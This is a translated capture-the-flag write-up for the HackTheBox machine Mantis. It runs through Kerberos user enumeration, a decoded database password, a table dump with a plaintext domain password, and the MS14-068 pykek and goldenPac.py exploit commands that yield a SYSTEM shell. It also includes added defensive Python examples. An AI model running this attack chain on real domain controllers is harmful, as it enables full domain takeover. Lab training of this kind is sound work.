HackTheBox Writeup: Taking Over the Mantis Host

The host we are going after this time is Mantis, and it takes a good deal of patience and a bit of enumeration to get there. The final exploitation technique is also very cool, because I had never done anything like it before. It was genuinely satisfying to see a domain controller finally pop a shell in HackTheBox.

Port Scanning

Let's start with an nmap scan.

root@kali:~/htb/mantis# nmap -A 10.10.10.52
Starting Nmap 7.50 ( https://nmap.org )
Nmap scan report for 10.10.10.52
Host is up (0.11s latency).
Not shown: 981 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-02-09T14:23:56
|_Not valid after:  2048-02-09T14:23:56
|_ssl-date: 2018-02-09T14:30:53+00:00; 0s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.50%E=4%D=2/9%OT=53%CT=1%CU=35559%PV=Y%DS=2%DC=T%G=Y%TM=5A7DB115
OS:%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%CI=I%TS=7)SEQ(SP=101%GCD=1
OS:%ISR=107%TS=7)SEQ(SP=103%GCD=1%ISR=108%TI=RD%CI=I%TS=8)OPS(O1=M54DNW8ST1
OS:1%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST
OS:11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80
OS:%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info:
|   10.10.10.52:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2018-02-09T09:30:52-05:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   52.42 ms  10.10.14.1
2   252.79 ms 10.10.10.52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 264.56 seconds

OK, the scan is done, and there is quite a lot here to analyze. LDAP is open, which tells us this is a domain controller. Port 8080 appears to be running an IIS site, so let's have a look at the page.

Apart from a login form there isn't much here, and we don't even have a username. A gobuster scan returns nothing beyond the directories that belong to the Orchard site. We can try enumerating usernames through Kerberos and see whether that gives us anything.

root@kali:~/htb/mantis# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm=htb.local,userdb=/usr/share/seclists/Usernames/Names/names.txt 10.10.10.52
Starting Nmap 7.50 ( https://nmap.org )
Nmap scan report for 10.10.10.52
Host is up (0.068s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|_    James@htb.local
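The enumeration above works because the KDC answers differently for names that exist and names that do not, and on the domain controller every probe for a nonexistent name is recorded as Security event 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The following Python check is an added example, not part of the original writeup; it runs over constructed event records (the field names are a reduced model of the real 4768 event) and flags any client address that produces a burst of such failures for many distinct names.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events (ID 4768, "A Kerberos
# authentication ticket (TGT) was requested"), reduced to the fields the
# check needs. Result 0x6 is KDC_ERR_C_PRINCIPAL_UNKNOWN: the requested
# account does not exist. 0x0 is a successful TGT request.
SAMPLE_EVENTS = [
    {"time": "2018-02-09T14:31:01", "account": "aaron",  "client_ip": "10.10.14.1",  "result": "0x6"},
    {"time": "2018-02-09T14:31:01", "account": "abel",   "client_ip": "10.10.14.1",  "result": "0x6"},
    {"time": "2018-02-09T14:31:02", "account": "adam",   "client_ip": "10.10.14.1",  "result": "0x6"},
    {"time": "2018-02-09T14:31:02", "account": "alice",  "client_ip": "10.10.14.1",  "result": "0x6"},
    {"time": "2018-02-09T14:31:03", "account": "amy",    "client_ip": "10.10.14.1",  "result": "0x6"},
    {"time": "2018-02-09T14:31:03", "account": "andrew", "client_ip": "10.10.14.1",  "result": "0x6"},
    {"time": "2018-02-09T14:40:00", "account": "james",  "client_ip": "10.10.10.30", "result": "0x0"},
    {"time": "2018-02-09T14:45:00", "account": "jmaes",  "client_ip": "10.10.10.31", "result": "0x6"},
]

UNKNOWN_PRINCIPAL = "0x6"


def detect_user_enumeration(events, threshold=5, window=timedelta(minutes=5)):
    """Return {client_ip: sorted distinct unknown names} for every source that
    produced at least `threshold` distinct KDC_ERR_C_PRINCIPAL_UNKNOWN results
    inside some `window`-long span. A lone typo (10.10.10.31) stays below it."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["result"].lower() == UNKNOWN_PRINCIPAL:
            stamp = datetime.fromisoformat(ev["time"])
            by_ip[ev["client_ip"]].append((stamp, ev["account"].lower()))

    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until hits[start..end] fit inside it.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if len({name for _, name in hits[start:end + 1]}) >= threshold:
                # Report every name this source probed, not just the window that tripped.
                flagged[ip] = sorted({name for _, name in hits})
                break
    return flagged


if __name__ == "__main__":
    for ip, names in detect_user_enumeration(SAMPLE_EVENTS).items():
        print(f"{ip}: {len(names)} unknown principals probed, e.g. {names[:3]}")
```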

Now we have a username. However, after trying james and james@htb.local as the username on the Orchard login page we found earlier and guessing at passwords, all we get back is the following message:

This is the point where most people get stuck. Let's start nmap again and run a full port scan to see whether there are ports our initial scan did not find.

root@kali:~/htb/mantis# nmap -p- 10.10.10.52 -T4
Starting Nmap 7.50 ( https://nmap.org )
Initiating Ping Scan at 10:05
Scanning 10.10.10.52 [4 ports]
Completed Ping Scan at 10:05, 0.42s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:05
Completed Parallel DNS resolution of 1 host. at 10:05, 6.18s elapsed
Initiating SYN Stealth Scan at 10:05
Scanning 10.10.10.52 [65535 ports]

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49164/tcp open  unknown
49166/tcp open  unknown
49168/tcp open  unknown
50255/tcp open  unknown

This scan takes a long time, but we do see that port 1337 is open. Browsing to that port shows the default IIS landing page.

Let's run gobuster against the newly discovered port.

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.52:1337/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/secure_notes (Status: 301)

After a long scan we finally get a useful piece of information.

The web.config file returns a 404. The string after dev_notes looks base64-encoded. The page content gives us a username, admin, and the database name, orcharddb.

Let's try to decode the base64 in the file name.

root@kali:~/htb/mantis# base64 -d <<< NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx
6d2424716c5f53405f504073735730726421

That doesn't match any common hash length, but it does look like hex.

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
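The two decode steps above, generalized into an added Python helper that is not part of the original writeup: it peels base64 and hex layers until readable text appears, and when a hex string has the length of a common digest it stops and reports that instead of decoding, which is the check the writeup applies by eye.

```python
import base64
import binascii
import re
import string

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Hex lengths of common digests. A hex string of one of these lengths is far
# more likely to be a hash than an encoding with something readable inside.
DIGEST_HEX_LENGTHS = {32: "MD5/NTLM", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}


def _is_printable(data: bytes) -> bool:
    try:
        return all(ch in string.printable for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def peel_encodings(token: str, max_layers: int = 5):
    """Unwrap base64/hex layers until plain text appears.
    Returns (layers_removed, final_text, digest_hint); digest_hint names the
    hash family when the remaining hex string has a common digest length."""
    layers, current = [], token
    for _ in range(max_layers):
        if len(current) % 2 == 0 and HEX_RE.match(current):
            hint = DIGEST_HEX_LENGTHS.get(len(current))
            if hint:
                return layers, current, hint
            decoded, layer = bytes.fromhex(current), "hex"
        elif len(current) % 4 == 0 and B64_RE.match(current):
            try:
                decoded, layer = base64.b64decode(current, validate=True), "base64"
            except binascii.Error:
                break
        else:
            break
        if not _is_printable(decoded):
            break  # binary result: the text we already had was the payload
        layers.append(layer)
        current = decoded.decode("ascii")
    return layers, current, None


if __name__ == "__main__":
    # The file-name token from the secure_notes page.
    print(peel_encodings("NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"))
```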

Onwards! Let's try these credentials. Connecting to MSSQL with sqsh using sa as the username and the password we just recovered returns access denied. With the admin user and that same password, however, we are in.

root@kali:~/htb/mantis# sqsh -S 10.10.10.52 -U admin
sqsh-2.1.7 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2010 Michael Peppler
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Password:
1>

Now we enumerate the table names in the orcharddb database.

Note: I have reformatted the output below, since sqsh's output format is messy. If you prefer, you can write the output to a CSV file and inspect it elsewhere; the command for that is:

go -m csv > /root/htb/mantis/table.csv

1> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';
2> go
TABLE_NAME
-------------------------------------------------------------------------------
blog_Orchard_Blogs_RecentBlogPostsPartRecord
blog_Orchard_Blogs_BlogArchivesPartRecord
blog_Orchard_Workflows_TransitionRecord
blog_Orchard_Workflows_WorkflowRecord
blog_Orchard_Workflows_WorkflowDefinitionRecord
blog_Orchard_Workflows_AwaitingActivityRecord
blog_Orchard_Workflows_ActivityRecord
blog_Orchard_Tags_TagsPartRecord
blog_Orchard_Framework_DataMigrationRecord
blog_Orchard_Tags_TagRecord
blog_Orchard_Tags_ContentTagRecord
blog_Settings_ContentFieldDefinitionRecord
blog_Orchard_Framework_DistributedLockRecord
blog_Settings_ContentPartDefinitionRecord
blog_Settings_ContentPartFieldDefinitionRecord
blog_Settings_ContentTypeDefinitionRecord
blog_Settings_ContentTypePartDefinitionRecord
blog_Settings_ShellDescriptorRecord
blog_Settings_ShellFeatureRecord
blog_Settings_ShellFeatureStateRecord
blog_Settings_ShellParameterRecord
blog_Settings_ShellStateRecord
blog_Orchard_Framework_ContentItemRecord
blog_Orchard_Framework_ContentItemVersionRecord
blog_Orchard_Framework_ContentTypeRecord
blog_Orchard_Framework_CultureRecord
blog_Common_BodyPartRecord
blog_Common_CommonPartRecord
blog_Common_CommonPartVersionRecord
blog_Common_IdentityPartRecord
blog_Containers_ContainerPartRecord
blog_Containers_ContainerWidgetPartRecord
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord
blog_Navigation_MenuPartRecord
blog_Navigation_AdminMenuPartRecord
blog_Scheduling_ScheduledTaskRecord
blog_Orchard_ContentPicker_ContentMenuItemPartRecord
blog_Orchard_Alias_AliasRecord
blog_Orchard_Alias_ActionRecord
blog_Orchard_Autoroute_AutoroutePartRecord
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_PermissionRecord
blog_Orchard_Roles_RoleRecord
blog_Orchard_Roles_RolesPermissionsRecord
blog_Orchard_Roles_UserRolesPartRecord
blog_Orchard_Packaging_PackagingSource
blog_Orchard_Recipes_RecipeStepResultRecord
blog_Orchard_OutputCache_CacheParameterRecord
blog_Orchard_MediaProcessing_ImageProfilePartRecord
blog_Orchard_MediaProcessing_FilterRecord
blog_Orchard_MediaProcessing_FileNameRecord
blog_Orchard_Widgets_LayerPartRecord
blog_Orchard_Widgets_WidgetPartRecord
blog_Orchard_Comments_CommentPartRecord
blog_Orchard_Comments_CommentsPartRecord
blog_Orchard_Taxonomies_TaxonomyPartRecord
blog_Orchard_Taxonomies_TermPartRecord
blog_Orchard_Taxonomies_TermContentItem
blog_Orchard_Taxonomies_TermsPartRecord
blog_Orchard_MediaLibrary_MediaPartRecord
blog_Orchard_Blogs_BlogPartArchiveRecord

(62 rows affected)

The blog_Orchard_Users_UserPartRecord table looks like the one we want.

1> USE orcharddb;
2> go
1> SELECT * FROM blog_Orchard_Users_UserPartRecord;
2> go
Id  UserName  Email            NormalizedUserName  Password                                                              PasswordFormat  HashAlgorithm  PasswordSalt              RegistrationStatus  EmailStatus  EmailChallengeToken  CreatedUtc          LastLoginUtc        LastLogoutUtc
-------------------------------------------------------------------------------
2   admin                      admin               AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==  Hashed          PBKDF2         UBwWF1CQCsaGc/P7jIR/kg==  Approved            Approved     NULL                 Sep 1 2017 01:44PM  Sep 1 2017 02:03PM  Sep 1 2017 02:06PM
15  James     james@htb.local  james               J@m3s_P@ssW0rd!                                                       Plaintext       Plaintext      NA                        Approved            Approved     NULL                 Sep 1 2017 01:45PM  NULL                NULL

(2 rows affected)

Excellent, we have james's password. We already know that logging in to the web app as james only throws an exception, so let's test these credentials over SMB and see whether they are valid Windows credentials.

root@kali:~/htb/mantis# smbclient -L 10.10.10.52/ -U james
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\james's password:
Domain=[HTB] OS=[] Server=[]

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share

They are indeed valid, and we can list the shares on the machine. A quick look through SYSVOL shows two Group Policy Objects, but nothing useful there.

Exploitation

Our credentials won't get us a shell through winexe, so we have to find another way. Since we know this is a domain controller, perhaps we can leverage Kerberos to give us what we want.

For a detailed explanation of how the attack works, see: adsecurity.org/?

For a well-written article on executing the attack remotely, see: blog.liatsisfotis.com/k

After installing the dependencies listed in that article and grabbing the latest impacket, we can start the attack. Let's edit /etc/hosts and add the domain controller.

127.0.0.1   localhost
127.0.1.1   kali
10.10.10.52 mantis.htb.local mantis

Now we configure /etc/krb5.conf:

[libdefaults]
    default_realm = HTB.LOCAL

# The following krb5.conf variables are only for MIT Kerberos.
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true

[realms]
    HTB.LOCAL = {
        kdc = mantis.htb.local:88
        admin_server = mantis.htb.local
        default_domain = HTB.LOCAL
    }

[domain_realm]
    .domain.internal = HTB.LOCAL
    domain.internal = HTB.LOCAL

Let's sync our clock with the DC.

rdate -n 10.10.10.52

Now we can get the attack under way. First, working from the impacket examples directory, we request a ticket with kinit.

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# kinit james
Password for james@HTB.LOCAL:
root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: james@HTB.LOCAL

Valid starting       Expires              Service principal
02/09/2018 15:29:07  02/10/2018 01:29:07  krbtgt/HTB.LOCAL@HTB.LOCAL
	renew until 02/10/2018 15:28:37

Next we need james's SID.

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# rpcclient -U james mantis
Enter WORKGROUP\james's password:
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

Now we run the MS14-068 Python exploit script.

root@kali:~/htb/mantis/pykek-master# python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis
Password:
  [+] Building AS-REQ for mantis... Done!
  [+] Sending AS-REQ to mantis... Done!
  [+] Receiving AS-REP from mantis... Done!
  [+] Parsing AS-REP from mantis... Done!
  [+] Building TGS-REQ for mantis... Done!
  [+] Sending TGS-REQ to mantis... Done!
  [+] Receiving TGS-REP from mantis... Done!
  [+] Parsing TGS-REP from mantis... Done!
  [+] Creating ccache file 'TGT_james@HTB.LOCAL.ccache'... Done!

By default, any user ticket-granting ticket (TGT) the client uses is read from the default Kerberos credential cache, which lives at /tmp/krb5cc_uid. So now that we have our cache file, we need to copy it into place.

root@kali:~/htb/mantis/pykek-master# cp TGT_james@HTB.LOCAL.ccache /tmp/krb5cc_0

With everything in place, we can use goldenPac.py from impacket's examples to get a shell.

root@kali:~/htb/mantis/impacket-master/impacket-master/examples# ./goldenPac.py HTB.LOCAL/james@mantis
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies

Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file cugfXzCt.exe
[*] Opening SVCManager on mantis.....
[*] Creating service QcYY on mantis.....
[*] Starting service QcYY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami & hostname
nt authority\system
mantis
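What the KDC got wrong in MS14-068, as an added illustration that is not part of the original writeup: the Privilege Attribute Certificate (PAC) inside a ticket is protected by two checksums, and an unpatched KDC validated them with whatever checksum type the PAC itself declared, including unkeyed types such as RSA-MD5 that anyone can compute without the krbtgt key. The Python below is a deliberately simplified model (a flat PAC body, the key used directly with no Kerberos key derivation, and constructed demo values) that places the pre-fix verifier beside the hardened one, which only accepts the keyed checksum type its own key implies.

```python
import hashlib
import hmac
import struct
import zlib

# Kerberos checksum type numbers (RFC 3961 / MS-PAC). CRC32 and RSA-MD5 are
# unkeyed: anyone can compute them, so they prove nothing about who built the PAC.
CRC32 = 1
RSA_MD5 = 7
HMAC_SHA1_96_AES256 = 16

def sign_pac(pac_body: bytes, cksum_type: int, key: bytes = b"") -> bytes:
    """Simplified PAC_SIGNATURE_DATA: little-endian type, then the checksum.
    Real Kerberos derives a usage-specific key first; this toy uses `key` directly."""
    if cksum_type == CRC32:
        digest = struct.pack("<I", zlib.crc32(pac_body) & 0xFFFFFFFF)
    elif cksum_type == RSA_MD5:
        digest = hashlib.md5(pac_body).digest()
    elif cksum_type == HMAC_SHA1_96_AES256:
        digest = hmac.new(key, pac_body, hashlib.sha1).digest()[:12]
    else:
        raise ValueError(f"unsupported checksum type {cksum_type}")
    return struct.pack("<i", cksum_type) + digest

def verify_pac_vulnerable(pac_body: bytes, signature: bytes, krbtgt_key: bytes) -> bool:
    """Pre-MS14-068 behaviour: trust the checksum type declared inside the PAC,
    so a PAC 'signed' with plain MD5 validates without knowing the krbtgt key."""
    cksum_type = struct.unpack("<i", signature[:4])[0]
    try:
        expected = sign_pac(pac_body, cksum_type, krbtgt_key)
    except ValueError:
        return False
    return hmac.compare_digest(signature, expected)

def verify_pac_fixed(pac_body: bytes, signature: bytes, krbtgt_key: bytes,
                     required_type: int = HMAC_SHA1_96_AES256) -> bool:
    """Patched behaviour: only the keyed checksum type matching the KDC's own
    key is acceptable; anything else is rejected before any digest is compared."""
    cksum_type = struct.unpack("<i", signature[:4])[0]
    if cksum_type != required_type:
        return False
    return hmac.compare_digest(signature, sign_pac(pac_body, cksum_type, krbtgt_key))

# Constructed demo values: a PAC body asserting extra group membership, "signed"
# with unkeyed MD5 by a requester who does not hold the krbtgt key.
KRBTGT_KEY = b"constructed-krbtgt-key-unknown-to-the-requester"
FORGED_BODY = b"constructed PAC logon info: james plus privileged group RIDs"
FORGED_SIG = sign_pac(FORGED_BODY, RSA_MD5)
```

Feeding FORGED_SIG to both verifiers shows the difference: verify_pac_vulnerable returns True, verify_pac_fixed returns False, while a signature produced with KRBTGT_KEY and HMAC_SHA1_96_AES256 passes the fixed check.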

We now have a shell as SYSTEM! From here we can collect user.txt and root.txt.

Translated from: sploitspren.com/2018-02 ; if you repost, please cite the original at 4hou.com/technology/106 (published by 嘶吼專業版, Pro4hou).
